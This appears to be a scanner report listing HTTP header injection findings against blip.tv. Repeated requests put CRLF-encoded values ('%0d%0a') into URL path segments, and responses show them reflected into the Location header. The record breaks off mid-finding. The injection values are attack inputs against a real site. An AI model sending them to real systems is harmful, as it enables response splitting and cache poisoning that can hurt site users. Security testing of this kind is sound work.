GET /file/5716a%0d%0ad4e7b0c5e2d/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/5716a d4e7b0c5e2d/Puddinheadbros-GregeneezerAndTheThreeMonsters723.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1025266634 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/5716a d4e7b0c5e2d/Pudd ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload dca82%0d%0a1e10a54d81c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/dca82%0d%0a1e10a54d81c HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/dca82 1e10a54d81c Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1025266669 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/dca82 1e10a54d81c" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 681cb%0d%0a3419a97bd3c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /681cb%0d%0a3419a97bd3c/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/681cb 3419a97bd3c/get/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv Content-Type: text/html; charset=iso-8859-1 Content-Length: 350 Date: Thu, 20 Jan 2011 00:38:25 GMT X-Varnish: 344226661 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/681cb 3419a97bd3c/get/Puddi ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload edb41%0d%0a09ccf4faebb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/edb41%0d%0a09ccf4faebb/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/edb41 09ccf4faebb/Puddinheadbros-GregeneezerAndTheThreeMonsters836.flv Content-Type: text/html; charset=iso-8859-1 Content-Length: 336 Date: Thu, 20 Jan 2011 00:38:25 GMT X-Varnish: 2146045301 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/edb41 09ccf4faebb/Pudd ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 34f59%0d%0ac42b6f400ed was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/34f59%0d%0ac42b6f400ed HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/34f59 c42b6f400ed Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:25 GMT X-Varnish: 344226741 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/34f59 c42b6f400ed" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 8d029%0d%0aad712a041c1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8d029%0d%0aad712a041c1/get/Squatters-Episode13234.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/8d029 ad712a041c1/get/Squatters-Episode13234.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 324 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1324527425 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/8d029 ad712a041c1/get/Squat ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 199f8%0d%0a84438fc7315 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/199f8%0d%0a84438fc7315/Squatters-Episode13234.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/199f8 84438fc7315/Squatters-Episode13234.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 310 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1248905335 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/199f8 84438fc7315/Squa ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 28e9d%0d%0a714b07cdff8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/28e9d%0d%0a714b07cdff8 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/28e9d 714b07cdff8 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 344227195 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/28e9d 714b07cdff8" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 887de%0d%0ad8caab3d9df was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /887de%0d%0ad8caab3d9df/get/Squatters-Episode13604.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/887de d8caab3d9df/get/Squatters-Episode13604.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 309 Date: Thu, 20 Jan 2011 00:38:27 GMT X-Varnish: 344227043 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/887de d8caab3d9df/get/Squat ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 9f258%0d%0a598cdcfe38c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/9f258%0d%0a598cdcfe38c/Squatters-Episode13604.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/9f258 598cdcfe38c/Squatters-Episode13604.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 310 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1324527433 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/9f258 598cdcfe38c/Squa ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 374f6%0d%0a4993a0b8373 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/374f6%0d%0a4993a0b8373 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/374f6 4993a0b8373 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:28 GMT X-Varnish: 1248905355 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/374f6 4993a0b8373" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e3ad0%0d%0ac27f2f30a37 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e3ad0%0d%0ac27f2f30a37/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e3ad0 c27f2f30a37/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 359 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1025266617 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e3ad0 c27f2f30a37/get/Stupi ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload d727c%0d%0a131771b9b3c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/d727c%0d%0a131771b9b3c/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/d727c 131771b9b3c/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq171.mp3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 360 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1248905096 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/d727c 131771b9b3c/Stup ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload 72f06%0d%0ab6c0ac15760 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/72f06%0d%0ab6c0ac15760 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/get/72f06 b6c0ac15760 Content-Type: text/html; charset=iso-8859-1 Content-Length: 302 Date: Thu, 20 Jan 2011 00:38:27 GMT X-Varnish: 1274881608 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/72f06 b6c0ac15760" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 6a8c4%0d%0a179c2a49497 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6a8c4%0d%0a179c2a49497/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/6a8c4 179c2a49497/get/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 359 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1025266631 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/6a8c4 179c2a49497/get/Stupi ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload c374d%0d%0add42cac7674 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/c374d%0d%0add42cac7674/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/file/c374d dd42cac7674/StupidForMovies-Ep35ReviewsMegamindDueDateJoleneHughJackmanInXManPreq664.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 375 Date: Thu, 20 Jan 2011 00:38:26 GMT X-Varnish: 1248905106 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/c374d dd42cac7674/Stup ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload cddb8%0d%0ab6166b364cf was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/cddb8%0d%0ab6166b364cf HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/cddb8 b6166b364cf Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:27 GMT X-Varnish: 1248905149 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/cddb8 b6166b364cf" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 3f10b%0d%0a51001ccf226 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3f10b%0d%0a51001ccf226/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/3f10b 51001ccf226/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 339 Date: Thu, 20 Jan 2011 00:38:12 GMT X-Varnish: 1025264822 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/3f10b 51001ccf226/get/VZW-O ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b4092%0d%0a3b92220f3b6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/b4092%0d%0a3b92220f3b6/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/b4092 3b92220f3b6/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf399.m4v?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 349 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 1498214947 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/b4092 3b92220f3b6/VZW- ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload de003%0d%0a42b9ec182a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/de003%0d%0a42b9ec182a?source=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/de003 42b9ec182a?source=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 295 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 1498214992 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/de003 42b9ec182a?s ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 15ea0%0d%0ae3a498f2e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /15ea0%0d%0ae3a498f2e9/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/15ea0 e3a498f2e9/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 353 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 1025264990 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/15ea0 e3a498f2e9/get/VZW-Of ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload b0487%0d%0a02cb8e0b3b2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /file/b0487%0d%0a02cb8e0b3b2/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/b0487 02cb8e0b3b2/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf458.m4v Content-Type: text/html; charset=iso-8859-1 Content-Length: 340 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 1274879957 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/b0487 02cb8e0b3b2/VZW- ...[SNIP]...
The value of REST URL parameter 3 is copied into the Location response header. The payload c4bba%0d%0a09ac88edd77 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /file/get/c4bba%0d%0a09ac88edd77 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/file/get/c4bba 09ac88edd77 Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 344225290 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/file/get/c4bba 09ac88edd77" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 39861%0d%0a701665a5f12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /39861%0d%0a701665a5f12/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/39861 701665a5f12/get/VZW-OfWebseriesAndWerewolvesVampireZombieWerewolf552.mp3 Content-Type: text/html; charset=iso-8859-1 Content-Length: 354 Date: Thu, 20 Jan 2011 00:38:14 GMT X-Varnish: 2146043821 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/39861 701665a5f12/get/VZW-O ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload c8150%0d%0aa8ef03bb86d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
